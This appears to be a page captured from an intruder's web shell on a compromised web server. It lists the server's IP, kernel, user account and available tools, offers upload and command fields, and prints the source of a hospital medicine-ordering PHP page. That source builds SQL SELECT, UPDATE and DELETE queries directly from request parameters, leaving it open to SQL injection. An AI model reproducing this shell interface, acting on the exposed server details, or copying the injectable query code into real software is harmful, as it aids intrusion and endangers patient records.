Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.119.140.218
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//ordercreate.php
<?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("dashboarddocument.php");
include("header.php");
?>

<?php
session_start();
include("dbconnection.php");
require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
if(isset($_POST[opdmedicine]))
{
   PatientManager::Medicineorder("$_GET[prescriptionid]","$_GET[patientid]","$_POST[DRUGS]","$_POST[Dose]","$_POST[Frequency]","$_POST[Quantity]","$_POST[status]","$_POST[entered_by]");
	PatientManager::Medicine("$_GET[prescriptionid]","$_GET[patientid]","$_POST[DRUGS]","$_POST[Dose]","$_POST[Route]","$_POST[Frequency]","$_POST[Quantity]","$_POST[potential]","$_POST[poa]","$_POST[status]","$_POST[Action]","$_POST[availability]","$_POST[batchno]","$_POST[st0]","$_POST[st1]","$_POST[st2]","$_POST[st3]","$_POST[st4]","$_POST[st5]","$_POST[drid]","$_POST[treatmentid]","$_POST[entered_by]");
	 }
	 
elseif(isset($_POST[status]))

	{
		PatientManager::medimgnt("$_GET[prescriptionid]","$_GET[patientid]","$_POST[medicine_id]","$_POST[DRUGS]","$_POST[timeslot]","$_POST[admissiondate]","$_POST[status]","$_POST[entered_by]");
	 }
	 if(isset($_POST[statusmedicineva]))
{ 
$sql ="UPDATE medicinede SET status='$_POST[status]' WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND id='$_GET[id]'";
if($qsql = mysqli_query($con,$sql))
		{
    //echo "<script> window.history.go(-1)</script>";
     } 
    
}

?>

<?php
include("dbconnection.php");
if(isset($_GET[delid]))
{
	$sql ="DELETE FROM medicinede WHERE id='$_GET[id]'";
	$qsql=mysqli_query($con,$sql);
	if(mysqli_affected_rows($con) == 1)
	{
	//	echo "<script>alert('Deleted successfully..');</script>";
	}
}
?>


<?php
include("dbconnection.php");
if(isset($_GET[delid]))
{
	$sql12911 ="DELETE FROM medication_mng WHERE id='$_GET[id]'";
	$qsql12911=mysqli_query($con,$sql12911);
	if(mysqli_affected_rows($con) == 1)
	{
		echo "<script>alert('Un-done successfully..');</script>";
	}
}
?><div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
<div class="">
        <div class="modal-content">
        <div class="contact-form">
            <?php
            $sql1 ="SELECT * FROM medicinede WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND status='Active' AND id='$_GET[id]' ";
$qsql1 = mysqli_query($con,$sql1);
$rs1 = mysqli_fetch_array($qsql1);

            ?>
     <form name="opdmedicine" method="post">
<?php
$sql12 ="SELECT * FROM medicine_stok WHERE medicine_id='$rs1[DRUGS]'";
$qsql13 = mysqli_query($con,$sql12);
$rs13 = mysqli_fetch_array($qsql13);
if (is_numeric($rs1[DRUGS])){
?>
<label>Drug Name</label> <input onkeyup="this.value = this.value.toUpperCase();" value='<?php echo $rs13['DRUGS_name'] ?>' onchange="drmdiload(this.value)"  name='DRUGSSS' type='text' list='DRUGS'  readonly/>

<input  value='<?php echo $rs13['medicine_id'] ?>'   name='DRUGS' type='hidden' list='DRUGS' />

<datalist name='DRUGS' id='DRUGS'>
 
				<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
$sql ="SELECT * FROM medicine_stok WHERE admin_id='$re[entered_by]'";
$qsql = mysqli_query($con,$sql);
while($rs = mysqli_fetch_array($qsql))
{
     echo " 
<option value>Select one...</option> ";?>

     <option value='<?php echo $rs['medicine_id']?>' <?php if($rs['medicine_id']==$rs1['DRUGS']) echo 'selected="selected"'; ?>><?php echo $rs['DRUGS_name'] ?>-<?php echo $rs['Dose'] ?></option>
                   
          
         <?php 
}
}
}
?> 
  </datalist>	
<div id='divmedidr'>
						<label>Dose</label>
					<input type='text' value='<?php echo $rs1['Dose'] ?> Mg' name='Dose' id='dose' class='form-control' >
				<input type='hidden' value='<?php echo $rs13['Category'] ?>' name='Category' id='Category' class='form-control' >
						
				</div>
		
			
	<input type='hidden' value='1' name='Frequency' id='Frequency' class='form-control' >
	<input type='hidden' value='none' name='potential' id='potential' class='form-control' >
	<input type='hidden' value='<?php echo $rs1['Route'] ?>' name='Route' id='Route' class='form-control' >
	    	    <label>Quantity Requested</label>
	    <input type="text" placeholder="Quantity" name="Quantity" required>
<input type="hidden" name="status" value="Active">
<input type="hidden" name="poa" value="ipd_Medicine" >
	
       <input type="submit" value="Add" name="opdmedicine">
 </form></div></div></div></div></section></div>
    <script>
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
    <script>
 function drmdiload(drmeid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divmedidr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loaddrug.php?drmeid="+drmeid,true);
        xmlhttp.send();
}
          
 function frequency(frid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("frequency").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loadfrequency.php?frid="+frid,true);
        xmlhttp.send();
}
             
     
</script>
  </body>
</html>



<script>
 function mobile(mbid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divmb").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loadtimeslot.php?mbid="+mbid,true);
        xmlhttp.send();
}
            
     
</script>

Anon7 - 2022
AnonSec Team